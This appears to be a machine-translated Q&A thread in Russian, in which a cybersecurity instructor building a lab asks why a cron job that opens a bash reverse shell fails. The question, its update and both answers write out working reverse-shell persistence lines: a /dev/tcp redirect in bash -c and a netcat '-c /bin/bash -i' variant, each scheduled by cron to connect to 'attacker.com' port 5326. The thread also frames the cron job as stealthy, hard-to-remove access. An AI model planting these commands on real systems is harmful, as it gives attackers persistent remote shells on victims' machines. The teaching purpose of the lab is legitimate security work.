Команда обратной оболочки Bash не работает cron - я сдаюсь

Question

Я преподаю кибербезопасность в университете и пишу лабораторию для Netcat и обратных оболочек.Я создал задание cron, которое запускает скрипт, который подключается к моему слушателю.Это отлично работает.Проблема в том, что с этим слишком много отпечатков пальцев, и скрипт можно удалить.Часть лаборатории посвящена скрытным операциям (например, ставится пробел перед любой введенной командой).

Я пытаюсь заставить эту команду выполнить.Прямо сейчас частота не важна, хотя в конечном счете она будет работать при загрузке и каждые 30 минут.

/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

При запуске из командной строки команда работает и устанавливается обратная оболочка.Я не хочу использовать порт 80, потому что я DO хочу, чтобы это было заблокировано, если студент решит попробовать что-то глупое.Также следующая лаборатория на iptables блокирует этот порт.

Я пробовал цитаты.Я пробовал sudo.Двойные амперсанды в конце.Одиночные амперсанды в конце.Дальнейшие уточнения пути к / tcp /.Я не думаю, что мне нужно определять, с какого tty сеанса он запускается (это было бы сложно).Ни в коем случае команда cron-run не будет успешной.

crontab -l

# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
* * * * * /bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

Вот системный журнал

cat /var/log/syslog 

Mar 19 07:42:01 raspberrypi CRON[12921]: (pi) CMD (/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1)
Mar 19 07:42:01 raspberrypi CRON[12917]: (CRON) info (No MTA installed, discarding output)

Похоже, что он не работает ... он просто не работает.

Значит, для многих, кто здесь умнее меня, что я делаю неправильно и как заставить эту команду работать как задание cron (вызов сценария не вариант)?

ОБНОВЛЕНИЕ: решение - * * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1', хотя есть две ошибки, над которыми я до сих пор работаю.

Answer 1

/dev/tcp Башизм

Обратите внимание, что /dev/tcp/host/port - это bashism !

cron не поймет их!

Вы можете попробовать:

* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1'

или используйте не bash-путь:

с использованием netcat для образца:

* * * * * /usr/bin/nc -c /bin/bash\ -i attacker.com 5326 0>&1

(см. man nc.traditional против man nc.openbsd)

Answer 2

Я подозреваю, что у вас есть несоответствие между тем, что находится в массиве argv, переданном из командной строки, и тем, что есть в демоне cron.Хотя я не могу сказать, что такое пропущенный выход, вот общий способ его диагностики:

void main(int argc, char **argv) {
  for( int i=0; i<argc; i++) 
    printf("%d: '%s'\n",i,argv[i])
}

Если вы скомпилируете это в двоичный файл и запустите его с вашими аргументами, в обоих случаях вы должны увидетьРазница:

./a.out -i >& /dev/tcp/attacker.com/5326 0>&1

против:

* * * * * /path/a.out -i >& /dev/tcp/attacker.com/5326 0>&1

Если разница не в argv, то >& и 0>&1 не будут обработаны процессом командной строки bash(а не запускаемый) и применяется к выполняемой оболочке bash, чтобы двоичный файл атакующего не имел перенаправления, а его родительский процесс имел?

Редактировать:

F.Хаури делает хорошее замечание, но вы, вероятно, хотите, чтобы ваш кротаб это:

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1'

(или они могли бы отредактировать свой ответ, часть /path/a.out неверна)

Edit2- захват вывода:

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1 >/path/to/logfile'